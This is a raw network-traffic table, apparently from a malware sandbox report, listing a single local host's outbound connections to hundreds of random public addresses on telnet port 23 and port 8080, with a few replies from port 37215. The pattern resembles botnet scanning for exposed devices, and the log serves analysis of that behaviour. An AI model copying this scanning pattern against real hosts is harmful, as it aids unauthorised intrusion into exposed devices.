                                              Nov 23, 2023 05:14:51.611371040 CET5573823192.168.2.13165.198.227.211
                                              Nov 23, 2023 05:14:51.611387968 CET5573823192.168.2.1387.254.230.139
                                              Nov 23, 2023 05:14:51.611396074 CET5573823192.168.2.13196.191.78.167
                                              Nov 23, 2023 05:14:51.611399889 CET5573823192.168.2.13223.99.218.62
                                              Nov 23, 2023 05:14:51.611411095 CET5573823192.168.2.1313.65.167.221
                                              Nov 23, 2023 05:14:51.611427069 CET5573823192.168.2.1339.72.55.204
                                              Nov 23, 2023 05:14:51.611438036 CET5573823192.168.2.13178.104.218.140
                                              Nov 23, 2023 05:14:51.611442089 CET5573823192.168.2.1360.16.17.101
                                              Nov 23, 2023 05:14:51.611450911 CET5573823192.168.2.13159.123.124.17
                                              Nov 23, 2023 05:14:51.611450911 CET5573823192.168.2.1399.229.43.103
                                              Nov 23, 2023 05:14:51.611468077 CET5573823192.168.2.13175.194.195.59
                                              Nov 23, 2023 05:14:51.611469984 CET5573823192.168.2.13177.117.52.61
                                              Nov 23, 2023 05:14:51.611476898 CET5573823192.168.2.1323.180.212.94
                                              Nov 23, 2023 05:14:51.611491919 CET5573823192.168.2.13139.156.19.186
                                              Nov 23, 2023 05:14:51.611493111 CET5573823192.168.2.138.108.250.161
                                              Nov 23, 2023 05:14:51.611495018 CET5573823192.168.2.1341.103.172.31
                                              Nov 23, 2023 05:14:51.611505032 CET5573823192.168.2.1316.180.56.58
                                              Nov 23, 2023 05:14:51.611514091 CET5573823192.168.2.13114.80.158.13
                                              Nov 23, 2023 05:14:51.611514091 CET5573823192.168.2.1357.100.208.60
                                              Nov 23, 2023 05:14:51.611527920 CET5573823192.168.2.13156.166.86.238
                                              Nov 23, 2023 05:14:51.611534119 CET5573823192.168.2.131.45.146.184
                                              Nov 23, 2023 05:14:51.611546040 CET5573823192.168.2.1342.246.86.146
                                              Nov 23, 2023 05:14:51.611546993 CET5573823192.168.2.13171.39.99.0
                                              Nov 23, 2023 05:14:51.611563921 CET5573823192.168.2.1317.38.205.206
                                              Nov 23, 2023 05:14:51.611565113 CET5573823192.168.2.13195.81.71.69
                                              Nov 23, 2023 05:14:51.611582041 CET5573823192.168.2.1361.198.96.82
                                              Nov 23, 2023 05:14:51.611582041 CET5573823192.168.2.1319.82.85.114
                                              Nov 23, 2023 05:14:51.611588955 CET5573823192.168.2.1353.120.7.39
                                              Nov 23, 2023 05:14:51.611605883 CET5573823192.168.2.13158.168.255.220
                                              Nov 23, 2023 05:14:51.611609936 CET5573823192.168.2.13181.76.197.163
                                              Nov 23, 2023 05:14:51.611634970 CET5573823192.168.2.13202.40.57.103
                                              Nov 23, 2023 05:14:51.611648083 CET5573823192.168.2.13168.232.93.197
                                              Nov 23, 2023 05:14:51.611659050 CET5573823192.168.2.135.62.35.82
                                              Nov 23, 2023 05:14:51.611659050 CET5573823192.168.2.1373.141.107.227
                                              Nov 23, 2023 05:14:51.611661911 CET5573823192.168.2.13173.255.43.204
                                              Nov 23, 2023 05:14:51.611679077 CET5573823192.168.2.13246.144.53.10
                                              Nov 23, 2023 05:14:51.611686945 CET5573823192.168.2.13115.155.13.165
                                              Nov 23, 2023 05:14:51.611686945 CET5573823192.168.2.13181.9.137.173
                                              Nov 23, 2023 05:14:51.611689091 CET5573823192.168.2.1363.244.227.112
                                              Nov 23, 2023 05:14:51.611695051 CET5573823192.168.2.1388.90.8.195
                                              Nov 23, 2023 05:14:51.611696005 CET5573823192.168.2.1348.169.229.54
                                              Nov 23, 2023 05:14:51.611701965 CET5573823192.168.2.13200.192.255.94
                                              Nov 23, 2023 05:14:51.611711025 CET5573823192.168.2.13209.90.32.0
                                              Nov 23, 2023 05:14:51.611711025 CET5573823192.168.2.13200.244.158.216
                                              Nov 23, 2023 05:14:51.611728907 CET5573823192.168.2.1393.22.107.33
                                              Nov 23, 2023 05:14:51.611737967 CET5573823192.168.2.13105.3.235.74
                                              Nov 23, 2023 05:14:51.611751080 CET5573823192.168.2.13185.17.1.145
                                              Nov 23, 2023 05:14:51.611752033 CET5573823192.168.2.13210.86.155.17
                                              Nov 23, 2023 05:14:51.611767054 CET5573823192.168.2.1348.82.249.18
                                              Nov 23, 2023 05:14:51.611782074 CET5573823192.168.2.13183.166.190.238
                                              Nov 23, 2023 05:14:51.611784935 CET5573823192.168.2.13112.34.184.221
                                              Nov 23, 2023 05:14:51.611793995 CET5573823192.168.2.1375.51.73.19
                                              Nov 23, 2023 05:14:51.611797094 CET5573823192.168.2.13155.251.118.78
                                              Nov 23, 2023 05:14:51.611807108 CET5573823192.168.2.13211.185.128.140
                                              Nov 23, 2023 05:14:51.611830950 CET5573823192.168.2.1369.204.36.148
                                              Nov 23, 2023 05:14:51.611838102 CET5573823192.168.2.1380.238.76.38
                                              Nov 23, 2023 05:14:51.611840963 CET5573823192.168.2.1334.100.233.17
                                              Nov 23, 2023 05:14:51.611855030 CET5573823192.168.2.1357.111.51.151
                                              Nov 23, 2023 05:14:51.611861944 CET5573823192.168.2.13108.241.183.44
                                              Nov 23, 2023 05:14:51.611871004 CET5573823192.168.2.1393.225.197.227
                                              Nov 23, 2023 05:14:51.611881971 CET5573823192.168.2.13251.252.38.66
                                              Nov 23, 2023 05:14:51.611898899 CET5573823192.168.2.13183.236.59.11
                                              Nov 23, 2023 05:14:51.611912012 CET5573823192.168.2.13201.161.216.161
                                              Nov 23, 2023 05:14:51.611916065 CET5573823192.168.2.13160.53.99.200
                                              Nov 23, 2023 05:14:51.611924887 CET5573823192.168.2.1364.24.141.249
                                              Nov 23, 2023 05:14:51.611931086 CET5573823192.168.2.1373.1.58.178
                                              Nov 23, 2023 05:14:51.611937046 CET5573823192.168.2.13221.54.173.0
                                              Nov 23, 2023 05:14:51.611949921 CET5573823192.168.2.13121.18.167.109
                                              Nov 23, 2023 05:14:51.611949921 CET5573823192.168.2.1347.114.183.9
                                              Nov 23, 2023 05:14:51.611963034 CET5573823192.168.2.1319.33.102.169
                                              Nov 23, 2023 05:14:51.611969948 CET5573823192.168.2.13105.2.43.243
                                              Nov 23, 2023 05:14:51.611974001 CET5573823192.168.2.13179.3.163.86
                                              Nov 23, 2023 05:14:51.611979961 CET5573823192.168.2.13125.255.179.81
                                              Nov 23, 2023 05:14:51.611984968 CET5573823192.168.2.13164.10.214.224
                                              Nov 23, 2023 05:14:51.611984968 CET5573823192.168.2.13199.109.42.240
                                              Nov 23, 2023 05:14:51.611996889 CET5573823192.168.2.13144.15.80.255
                                              Nov 23, 2023 05:14:51.612009048 CET5573823192.168.2.13195.236.50.95
                                              Nov 23, 2023 05:14:51.612011909 CET5573823192.168.2.1354.105.130.163
                                              Nov 23, 2023 05:14:51.612024069 CET5573823192.168.2.132.186.142.56
                                              Nov 23, 2023 05:14:51.612024069 CET5573823192.168.2.1386.183.251.218
                                              Nov 23, 2023 05:14:51.612035036 CET5573823192.168.2.13210.172.85.159
                                              Nov 23, 2023 05:14:51.612046957 CET5573823192.168.2.1377.180.139.77
                                              Nov 23, 2023 05:14:51.612050056 CET5573823192.168.2.1340.149.82.120
                                              Nov 23, 2023 05:14:51.612059116 CET5573823192.168.2.13172.208.14.231
                                              Nov 23, 2023 05:14:51.612072945 CET5573823192.168.2.1385.212.137.56
                                              Nov 23, 2023 05:14:51.612078905 CET5573823192.168.2.13104.39.202.85
                                              Nov 23, 2023 05:14:51.612092018 CET5573823192.168.2.13147.56.239.137
                                              Nov 23, 2023 05:14:51.612096071 CET5573823192.168.2.13197.207.40.115
                                              Nov 23, 2023 05:14:51.612104893 CET5573823192.168.2.13153.235.72.219
                                              Nov 23, 2023 05:14:51.612113953 CET5573823192.168.2.1386.103.180.21
                                              Nov 23, 2023 05:14:51.612113953 CET5573823192.168.2.131.178.136.131
                                              Nov 23, 2023 05:14:51.612123966 CET5573823192.168.2.13178.124.249.176
                                              Nov 23, 2023 05:14:51.612134933 CET5573823192.168.2.13135.197.255.73
                                              Nov 23, 2023 05:14:51.612157106 CET5573823192.168.2.13185.106.98.49
                                              Nov 23, 2023 05:14:51.612164974 CET5573823192.168.2.1374.156.44.19
                                              Nov 23, 2023 05:14:51.612168074 CET5573823192.168.2.1359.189.62.136
                                              Nov 23, 2023 05:14:51.612168074 CET5573823192.168.2.1388.6.130.134
                                              Nov 23, 2023 05:14:51.612168074 CET5573823192.168.2.1320.197.69.102
                                              Nov 23, 2023 05:14:51.612173080 CET5573823192.168.2.1384.61.241.117
                                              Nov 23, 2023 05:14:51.612173080 CET5573823192.168.2.1360.209.76.74
                                              Nov 23, 2023 05:14:51.612185001 CET5573823192.168.2.13153.136.166.217
                                              Nov 23, 2023 05:14:51.612185955 CET5573823192.168.2.13121.213.213.84
                                              Nov 23, 2023 05:14:51.612207890 CET5573823192.168.2.13183.106.222.94
                                              Nov 23, 2023 05:14:51.612209082 CET5573823192.168.2.1375.4.74.122
                                              Nov 23, 2023 05:14:51.612220049 CET5573823192.168.2.13126.169.50.179
                                              Nov 23, 2023 05:14:51.612226009 CET5573823192.168.2.13164.155.78.237
                                              Nov 23, 2023 05:14:51.612252951 CET5573823192.168.2.1371.29.34.114
                                              Nov 23, 2023 05:14:51.612255096 CET5573823192.168.2.13111.176.60.73
                                              Nov 23, 2023 05:14:51.612270117 CET5573823192.168.2.132.199.233.150
                                              Nov 23, 2023 05:14:51.612273932 CET5573823192.168.2.13105.171.187.94
                                              Nov 23, 2023 05:14:51.612273932 CET5573823192.168.2.13119.139.179.223
                                              Nov 23, 2023 05:14:51.612273932 CET5573823192.168.2.13147.139.193.126
                                              Nov 23, 2023 05:14:51.612293959 CET5573823192.168.2.1363.209.103.143
                                              Nov 23, 2023 05:14:51.612297058 CET5573823192.168.2.13109.199.24.37
                                              Nov 23, 2023 05:14:51.612304926 CET5573823192.168.2.135.69.184.56
                                              Nov 23, 2023 05:14:51.612318039 CET5573823192.168.2.13175.224.122.54
                                              Nov 23, 2023 05:14:51.612325907 CET5573823192.168.2.1348.211.79.158
                                              Nov 23, 2023 05:14:51.612327099 CET5573823192.168.2.13186.158.219.121
                                              Nov 23, 2023 05:14:51.612330914 CET5573823192.168.2.13101.22.24.197
                                              Nov 23, 2023 05:14:51.612332106 CET5573823192.168.2.13193.211.118.238
                                              Nov 23, 2023 05:14:51.612332106 CET5573823192.168.2.13111.188.100.222
                                              Nov 23, 2023 05:14:51.612346888 CET5573823192.168.2.1387.85.246.215
                                              Nov 23, 2023 05:14:51.612346888 CET5573823192.168.2.13177.5.88.166
                                              Nov 23, 2023 05:14:51.612361908 CET5573823192.168.2.13121.7.38.127
                                              Nov 23, 2023 05:14:51.612364054 CET5573823192.168.2.13160.4.3.102
                                              Nov 23, 2023 05:14:51.612380981 CET5573823192.168.2.1317.6.46.55
                                              Nov 23, 2023 05:14:51.612382889 CET5573823192.168.2.13201.204.5.206
                                              Nov 23, 2023 05:14:51.612560034 CET5456823192.168.2.1393.33.192.250
                                              Nov 23, 2023 05:14:51.654835939 CET574848080192.168.2.1331.200.60.86
                                              Nov 23, 2023 05:14:51.654841900 CET574468080192.168.2.1394.121.21.87
                                              Nov 23, 2023 05:14:51.750833988 CET483288080192.168.2.1385.69.27.156
                                              Nov 23, 2023 05:14:51.778182030 CET2355738154.9.65.4192.168.2.13
                                              Nov 23, 2023 05:14:51.795845032 CET3721554970156.19.240.50192.168.2.13
                                              Nov 23, 2023 05:14:51.815977097 CET235456893.33.192.250192.168.2.13
                                              Nov 23, 2023 05:14:51.816160917 CET5456823192.168.2.1393.33.192.250
                                              Nov 23, 2023 05:14:51.860070944 CET3721554970197.56.83.224192.168.2.13
                                              Nov 23, 2023 05:14:51.880882025 CET80805748431.200.60.86192.168.2.13
                                              Nov 23, 2023 05:14:51.881078005 CET542028080192.168.2.1362.22.177.166
                                              Nov 23, 2023 05:14:51.881078959 CET542028080192.168.2.1395.115.76.144
                                              Nov 23, 2023 05:14:51.881079912 CET574848080192.168.2.1331.200.60.86
                                              Nov 23, 2023 05:14:51.881078959 CET542028080192.168.2.1394.172.161.149
                                              Nov 23, 2023 05:14:51.881078959 CET542028080192.168.2.1394.117.58.17
                                              Nov 23, 2023 05:14:51.881082058 CET542028080192.168.2.1362.6.136.116
                                              Nov 23, 2023 05:14:51.881083012 CET542028080192.168.2.1395.98.118.144
                                              Nov 23, 2023 05:14:51.881083012 CET542028080192.168.2.1394.80.134.217
                                              Nov 23, 2023 05:14:51.881082058 CET542028080192.168.2.1394.99.246.70
                                              Nov 23, 2023 05:14:51.881083012 CET542028080192.168.2.1331.37.93.71
                                              Nov 23, 2023 05:14:51.881083012 CET542028080192.168.2.1394.106.105.166
                                              Nov 23, 2023 05:14:51.881083012 CET542028080192.168.2.1394.113.85.205
                                              Nov 23, 2023 05:14:51.881083012 CET542028080192.168.2.1385.60.226.232
                                              Nov 23, 2023 05:14:51.881112099 CET542028080192.168.2.1395.224.112.214
                                              Nov 23, 2023 05:14:51.881112099 CET542028080192.168.2.1331.62.239.166
                                              Nov 23, 2023 05:14:51.881112099 CET542028080192.168.2.1331.178.147.16
                                              Nov 23, 2023 05:14:51.881112099 CET542028080192.168.2.1385.170.169.191
                                              Nov 23, 2023 05:14:51.881115913 CET542028080192.168.2.1395.75.133.223
                                              Nov 23, 2023 05:14:51.881117105 CET542028080192.168.2.1331.254.220.223
                                              Nov 23, 2023 05:14:51.881117105 CET542028080192.168.2.1331.148.134.215
                                              Nov 23, 2023 05:14:51.881117105 CET542028080192.168.2.1362.173.64.54
                                              Nov 23, 2023 05:14:51.881118059 CET542028080192.168.2.1385.150.240.66
                                              Nov 23, 2023 05:14:51.881119013 CET542028080192.168.2.1331.153.38.7
                                              Nov 23, 2023 05:14:51.881119013 CET542028080192.168.2.1362.196.111.115
                                              Nov 23, 2023 05:14:51.881119967 CET542028080192.168.2.1362.200.131.165
                                              Nov 23, 2023 05:14:51.881119013 CET542028080192.168.2.1394.57.122.156
                                              Nov 23, 2023 05:14:51.881119967 CET542028080192.168.2.1395.15.193.145
                                              Nov 23, 2023 05:14:51.881118059 CET542028080192.168.2.1394.209.238.152
                                              Nov 23, 2023 05:14:51.881119967 CET542028080192.168.2.1394.205.68.21
                                              Nov 23, 2023 05:14:51.881118059 CET542028080192.168.2.1331.168.216.146
                                              Nov 23, 2023 05:14:51.881119967 CET542028080192.168.2.1362.144.92.43
                                              Nov 23, 2023 05:14:51.881139040 CET542028080192.168.2.1331.67.176.224
                                              Nov 23, 2023 05:14:51.881139040 CET542028080192.168.2.1395.84.92.76
                                              Nov 23, 2023 05:14:51.881139040 CET542028080192.168.2.1385.96.112.95
                                              Nov 23, 2023 05:14:51.881139040 CET542028080192.168.2.1385.42.139.40
                                              Nov 23, 2023 05:14:51.881139040 CET542028080192.168.2.1362.162.177.222
                                              Nov 23, 2023 05:14:51.881139040 CET542028080192.168.2.1395.190.71.156
                                              Nov 23, 2023 05:14:51.881140947 CET542028080192.168.2.1395.13.11.112
                                              Nov 23, 2023 05:14:51.881140947 CET542028080192.168.2.1331.147.58.126
                                              Nov 23, 2023 05:14:51.881140947 CET542028080192.168.2.1385.151.98.27
                                              Nov 23, 2023 05:14:51.881140947 CET542028080192.168.2.1362.63.155.56
                                              Nov 23, 2023 05:14:51.881144047 CET542028080192.168.2.1331.26.7.182
                                              Nov 23, 2023 05:14:51.881146908 CET542028080192.168.2.1385.244.2.226
                                              Nov 23, 2023 05:14:51.881146908 CET542028080192.168.2.1385.94.254.170
                                              Nov 23, 2023 05:14:51.881146908 CET542028080192.168.2.1395.143.170.113
                                              Nov 23, 2023 05:14:51.881160021 CET542028080192.168.2.1385.122.176.242
                                              Nov 23, 2023 05:14:51.881160021 CET542028080192.168.2.1394.169.95.215
                                              Nov 23, 2023 05:14:51.881159067 CET542028080192.168.2.1394.96.112.141
                                              Nov 23, 2023 05:14:51.881161928 CET542028080192.168.2.1394.52.40.170
                                              Nov 23, 2023 05:14:51.881161928 CET542028080192.168.2.1395.160.55.129
                                              Nov 23, 2023 05:14:51.881165028 CET542028080192.168.2.1331.192.218.83
                                              Nov 23, 2023 05:14:51.881170034 CET542028080192.168.2.1331.211.6.71
                                              Nov 23, 2023 05:14:51.881170034 CET542028080192.168.2.1362.224.74.31
                                              Nov 23, 2023 05:14:51.881170034 CET542028080192.168.2.1362.202.79.0
                                              Nov 23, 2023 05:14:51.881170034 CET542028080192.168.2.1385.157.24.245
                                              Nov 23, 2023 05:14:51.881170034 CET542028080192.168.2.1385.130.133.94
                                              Nov 23, 2023 05:14:51.881170034 CET542028080192.168.2.1385.61.114.216
                                              Nov 23, 2023 05:14:51.881170034 CET542028080192.168.2.1394.2.169.209
                                              Nov 23, 2023 05:14:51.881170034 CET542028080192.168.2.1395.70.124.1
                                              Nov 23, 2023 05:14:51.881175041 CET542028080192.168.2.1385.211.194.119
                                              Nov 23, 2023 05:14:51.881176949 CET542028080192.168.2.1394.251.91.141
                                              Nov 23, 2023 05:14:51.881176949 CET542028080192.168.2.1362.20.78.249
                                              Nov 23, 2023 05:14:51.881180048 CET542028080192.168.2.1385.195.197.95
                                              Nov 23, 2023 05:14:51.881180048 CET542028080192.168.2.1362.127.10.249
                                              Nov 23, 2023 05:14:51.881180048 CET542028080192.168.2.1331.208.138.186
                                              Nov 23, 2023 05:14:51.881181002 CET542028080192.168.2.1385.53.203.26
                                              Nov 23, 2023 05:14:51.881181002 CET542028080192.168.2.1331.251.174.62
                                              Nov 23, 2023 05:14:51.881181002 CET542028080192.168.2.1395.47.124.226
                                              Nov 23, 2023 05:14:51.881187916 CET542028080192.168.2.1362.77.42.102
                                              Nov 23, 2023 05:14:51.881202936 CET542028080192.168.2.1394.87.45.28
                                              Nov 23, 2023 05:14:51.881206989 CET542028080192.168.2.1395.85.141.224
                                              Nov 23, 2023 05:14:51.881206989 CET542028080192.168.2.1394.22.234.11
                                              Nov 23, 2023 05:14:51.881206989 CET542028080192.168.2.1385.44.151.117
                                              Nov 23, 2023 05:14:51.881213903 CET542028080192.168.2.1362.81.40.44
                                              Nov 23, 2023 05:14:51.881220102 CET542028080192.168.2.1394.78.246.87
                                              Nov 23, 2023 05:14:51.881220102 CET542028080192.168.2.1395.9.202.144
                                              Nov 23, 2023 05:14:51.881223917 CET542028080192.168.2.1362.1.84.155
                                              Nov 23, 2023 05:14:51.881234884 CET542028080192.168.2.1362.37.191.170
                                              Nov 23, 2023 05:14:51.881237030 CET542028080192.168.2.1394.122.23.166
                                              Nov 23, 2023 05:14:51.881263971 CET542028080192.168.2.1362.168.171.49
                                              Nov 23, 2023 05:14:51.881267071 CET542028080192.168.2.1385.100.66.81
                                              Nov 23, 2023 05:14:51.881267071 CET542028080192.168.2.1394.108.17.127
                                              Nov 23, 2023 05:14:51.881270885 CET542028080192.168.2.1362.122.131.213
                                              Nov 23, 2023 05:14:51.881272078 CET542028080192.168.2.1385.3.157.146
                                              Nov 23, 2023 05:14:51.881283998 CET542028080192.168.2.1331.247.138.111
                                              Nov 23, 2023 05:14:51.881293058 CET542028080192.168.2.1362.238.75.50
                                              Nov 23, 2023 05:14:51.881297112 CET542028080192.168.2.1394.68.72.221
                                              Nov 23, 2023 05:14:51.881295919 CET542028080192.168.2.1394.16.229.93
                                              Nov 23, 2023 05:14:51.881299973 CET542028080192.168.2.1362.12.95.81
                                              Nov 23, 2023 05:14:51.881299973 CET542028080192.168.2.1394.143.65.100
                                              Nov 23, 2023 05:14:51.881308079 CET542028080192.168.2.1394.180.43.135
                                              Nov 23, 2023 05:14:51.881324053 CET542028080192.168.2.1331.143.40.231
                                              Nov 23, 2023 05:14:51.881325006 CET542028080192.168.2.1385.160.108.141
                                              Nov 23, 2023 05:14:51.881326914 CET542028080192.168.2.1395.108.141.85
                                              Nov 23, 2023 05:14:51.881333113 CET542028080192.168.2.1394.29.207.96
                                              Nov 23, 2023 05:14:51.881345987 CET542028080192.168.2.1362.168.93.138
                                              Nov 23, 2023 05:14:51.881351948 CET542028080192.168.2.1331.255.108.175
                                              Nov 23, 2023 05:14:51.881356955 CET542028080192.168.2.1385.75.2.41
                                              Nov 23, 2023 05:14:51.881369114 CET542028080192.168.2.1394.206.210.86
                                              Nov 23, 2023 05:14:51.881369114 CET542028080192.168.2.1394.253.24.93
                                              Nov 23, 2023 05:14:51.881376028 CET542028080192.168.2.1331.218.158.165
                                              Nov 23, 2023 05:14:51.881386042 CET542028080192.168.2.1331.115.177.206
                                              Nov 23, 2023 05:14:51.881391048 CET542028080192.168.2.1331.75.32.162
                                              Nov 23, 2023 05:14:51.881391048 CET542028080192.168.2.1394.118.254.40
                                              Nov 23, 2023 05:14:51.881401062 CET542028080192.168.2.1385.2.40.104
                                              Nov 23, 2023 05:14:51.881397963 CET542028080192.168.2.1395.121.55.6
                                              Nov 23, 2023 05:14:51.881408930 CET542028080192.168.2.1394.114.179.66
                                              Nov 23, 2023 05:14:51.881423950 CET542028080192.168.2.1331.30.110.245
                                              Nov 23, 2023 05:14:51.881423950 CET542028080192.168.2.1394.122.111.170
                                              Nov 23, 2023 05:14:51.881431103 CET542028080192.168.2.1394.166.19.38
                                              Nov 23, 2023 05:14:51.881433010 CET542028080192.168.2.1362.71.234.116
                                              Nov 23, 2023 05:14:51.881439924 CET542028080192.168.2.1331.147.203.49
                                              Nov 23, 2023 05:14:51.881448984 CET542028080192.168.2.1385.12.76.206
                                              Nov 23, 2023 05:14:51.881453991 CET542028080192.168.2.1395.226.12.150
                                              Nov 23, 2023 05:14:51.881457090 CET542028080192.168.2.1385.140.160.111
                                              Nov 23, 2023 05:14:51.881464005 CET542028080192.168.2.1394.55.34.236
                                              Nov 23, 2023 05:14:51.881467104 CET542028080192.168.2.1362.63.120.85
                                              Nov 23, 2023 05:14:51.881479025 CET542028080192.168.2.1385.11.135.254
                                              Nov 23, 2023 05:14:51.881493092 CET542028080192.168.2.1362.25.135.195
                                              Nov 23, 2023 05:14:51.881493092 CET542028080192.168.2.1362.163.129.14
                                              Nov 23, 2023 05:14:51.881499052 CET542028080192.168.2.1395.201.138.43
                                              Nov 23, 2023 05:14:51.881501913 CET542028080192.168.2.1385.228.157.26
                                              Nov 23, 2023 05:14:51.881505966 CET542028080192.168.2.1385.47.255.51
                                              Nov 23, 2023 05:14:51.881505966 CET542028080192.168.2.1362.232.174.218
                                              Nov 23, 2023 05:14:51.881525040 CET542028080192.168.2.1331.81.66.218
                                              Nov 23, 2023 05:14:51.881525040 CET542028080192.168.2.1331.253.240.172
                                              Nov 23, 2023 05:14:51.881536961 CET542028080192.168.2.1385.62.139.3
                                              Nov 23, 2023 05:14:51.881541014 CET542028080192.168.2.1362.142.223.54
                                              Nov 23, 2023 05:14:51.881546974 CET542028080192.168.2.1385.221.191.244
                                              Nov 23, 2023 05:14:51.881550074 CET542028080192.168.2.1385.202.11.132
                                              Nov 23, 2023 05:14:51.881565094 CET542028080192.168.2.1395.190.120.253
                                              Nov 23, 2023 05:14:51.881567001 CET542028080192.168.2.1331.152.188.40
                                              Nov 23, 2023 05:14:51.881567955 CET542028080192.168.2.1385.14.247.1
                                              Nov 23, 2023 05:14:51.881567955 CET542028080192.168.2.1385.45.227.24
                                              Nov 23, 2023 05:14:51.881582975 CET542028080192.168.2.1395.187.33.154
                                              Nov 23, 2023 05:14:51.881582975 CET542028080192.168.2.1385.106.177.52
                                              Nov 23, 2023 05:14:51.881589890 CET542028080192.168.2.1395.146.114.218
                                              Nov 23, 2023 05:14:51.881597042 CET542028080192.168.2.1395.227.104.156
                                              Nov 23, 2023 05:14:51.881613016 CET542028080192.168.2.1394.40.84.47
                                              Nov 23, 2023 05:14:51.881613970 CET542028080192.168.2.1362.123.251.73
                                              Nov 23, 2023 05:14:51.881613970 CET542028080192.168.2.1394.177.150.19
                                              Nov 23, 2023 05:14:51.881618023 CET542028080192.168.2.1394.206.56.174
                                              Nov 23, 2023 05:14:51.881622076 CET542028080192.168.2.1385.75.47.153
                                              Nov 23, 2023 05:14:51.881624937 CET542028080192.168.2.1385.148.33.205
                                              Nov 23, 2023 05:14:51.881628036 CET542028080192.168.2.1395.63.101.188
                                              Nov 23, 2023 05:14:51.881640911 CET542028080192.168.2.1385.215.17.146
                                              Nov 23, 2023 05:14:51.881643057 CET542028080192.168.2.1385.202.128.76
                                              Nov 23, 2023 05:14:51.881648064 CET542028080192.168.2.1394.175.206.188
                                              Nov 23, 2023 05:14:51.881659985 CET542028080192.168.2.1395.46.233.162
                                              Nov 23, 2023 05:14:51.881661892 CET542028080192.168.2.1395.70.189.59
                                              Nov 23, 2023 05:14:51.881673098 CET542028080192.168.2.1331.69.102.12
                                              Nov 23, 2023 05:14:51.881673098 CET542028080192.168.2.1394.83.78.21
                                              Nov 23, 2023 05:14:51.881676912 CET542028080192.168.2.1385.105.55.121
                                              Nov 23, 2023 05:14:51.881684065 CET542028080192.168.2.1385.70.38.30
                                              Nov 23, 2023 05:14:51.881690025 CET542028080192.168.2.1395.84.48.92
                                              Nov 23, 2023 05:14:51.881702900 CET542028080192.168.2.1395.117.154.59
                                              Nov 23, 2023 05:14:51.881702900 CET542028080192.168.2.1395.53.96.26
                                              Nov 23, 2023 05:14:51.881711960 CET542028080192.168.2.1394.3.114.44
                                              Nov 23, 2023 05:14:51.881719112 CET542028080192.168.2.1331.81.241.239
                                              Nov 23, 2023 05:14:51.881726980 CET542028080192.168.2.1385.132.43.16
                                              Nov 23, 2023 05:14:51.881727934 CET542028080192.168.2.1385.86.197.126
                                              Nov 23, 2023 05:14:51.881741047 CET542028080192.168.2.1385.121.231.22
                                              Nov 23, 2023 05:14:51.881745100 CET542028080192.168.2.1395.0.38.111
                                              Nov 23, 2023 05:14:51.881752968 CET542028080192.168.2.1395.69.42.12
                                              Nov 23, 2023 05:14:51.881757975 CET542028080192.168.2.1395.40.139.57
                                              Nov 23, 2023 05:14:51.881763935 CET542028080192.168.2.1395.142.156.15
                                              Nov 23, 2023 05:14:51.881769896 CET542028080192.168.2.1331.65.63.144
                                              Nov 23, 2023 05:14:51.881783962 CET542028080192.168.2.1385.197.244.48
                                              Nov 23, 2023 05:14:51.881788015 CET542028080192.168.2.1362.184.126.107
                                              Nov 23, 2023 05:14:51.881793022 CET542028080192.168.2.1362.157.145.219
                                              Nov 23, 2023 05:14:51.881795883 CET542028080192.168.2.1385.180.113.154
                                              Nov 23, 2023 05:14:51.881803036 CET542028080192.168.2.1395.137.9.178
                                              Nov 23, 2023 05:14:51.881815910 CET542028080192.168.2.1394.42.238.189
                                              Nov 23, 2023 05:14:51.881822109 CET542028080192.168.2.1385.219.73.12
                                              Nov 23, 2023 05:14:51.881825924 CET542028080192.168.2.1331.72.44.31
                                              Nov 23, 2023 05:14:51.881836891 CET542028080192.168.2.1385.48.101.8
                                              Nov 23, 2023 05:14:51.881836891 CET542028080192.168.2.1395.72.239.178
                                              Nov 23, 2023 05:14:51.881846905 CET542028080192.168.2.1385.163.103.245
                                              Nov 23, 2023 05:14:51.881865025 CET542028080192.168.2.1385.79.56.158
                                              Nov 23, 2023 05:14:51.881865978 CET542028080192.168.2.1385.127.240.151
                                              Nov 23, 2023 05:14:51.881870985 CET542028080192.168.2.1331.158.12.106
                                              Nov 23, 2023 05:14:51.881877899 CET542028080192.168.2.1385.25.55.21
                                              Nov 23, 2023 05:14:51.881880045 CET542028080192.168.2.1362.209.158.226
                                              Nov 23, 2023 05:14:51.881896973 CET542028080192.168.2.1395.113.90.187
                                              Nov 23, 2023 05:14:51.881896973 CET542028080192.168.2.1394.104.68.205
                                              Nov 23, 2023 05:14:51.881896973 CET542028080192.168.2.1362.5.0.187
                                              Nov 23, 2023 05:14:51.881907940 CET542028080192.168.2.1362.252.39.172
                                              Nov 23, 2023 05:14:51.881913900 CET542028080192.168.2.1395.34.168.52
                                              Nov 23, 2023 05:14:51.881922960 CET542028080192.168.2.1395.98.8.155
                                              Nov 23, 2023 05:14:51.881925106 CET542028080192.168.2.1395.6.30.143
                                              Nov 23, 2023 05:14:51.881937027 CET542028080192.168.2.1394.100.173.161
                                              Nov 23, 2023 05:14:51.881941080 CET542028080192.168.2.1331.218.255.126
                                              Nov 23, 2023 05:14:51.881941080 CET542028080192.168.2.1331.29.58.144
                                              Nov 23, 2023 05:14:51.881949902 CET542028080192.168.2.1331.167.86.251
                                              Nov 23, 2023 05:14:51.881952047 CET542028080192.168.2.1394.231.183.78
                                              Nov 23, 2023 05:14:51.881975889 CET542028080192.168.2.1395.126.230.55
                                              Nov 23, 2023 05:14:51.881977081 CET542028080192.168.2.1395.17.10.247
                                              Nov 23, 2023 05:14:51.881979942 CET542028080192.168.2.1331.147.162.3
                                              Nov 23, 2023 05:14:51.881980896 CET542028080192.168.2.1331.143.19.176
                                              Nov 23, 2023 05:14:51.881980896 CET542028080192.168.2.1395.170.39.90
                                              Nov 23, 2023 05:14:51.881988049 CET542028080192.168.2.1362.101.8.247
                                              Nov 23, 2023 05:14:51.881988049 CET542028080192.168.2.1385.202.26.47
                                              Nov 23, 2023 05:14:51.881998062 CET542028080192.168.2.1394.57.223.52
                                              Nov 23, 2023 05:14:51.882005930 CET542028080192.168.2.1395.216.76.88
                                              Nov 23, 2023 05:14:51.882005930 CET542028080192.168.2.1395.35.75.245
                                              Nov 23, 2023 05:14:51.882014036 CET542028080192.168.2.1331.254.249.107
                                              Nov 23, 2023 05:14:51.882019997 CET542028080192.168.2.1385.98.229.27
                                              Nov 23, 2023 05:14:51.882019997 CET542028080192.168.2.1395.26.171.127
                                              Nov 23, 2023 05:14:51.882029057 CET542028080192.168.2.1395.147.135.26
                                              Nov 23, 2023 05:14:51.882035971 CET542028080192.168.2.1394.199.166.180
                                              Nov 23, 2023 05:14:51.882045031 CET542028080192.168.2.1385.225.95.141
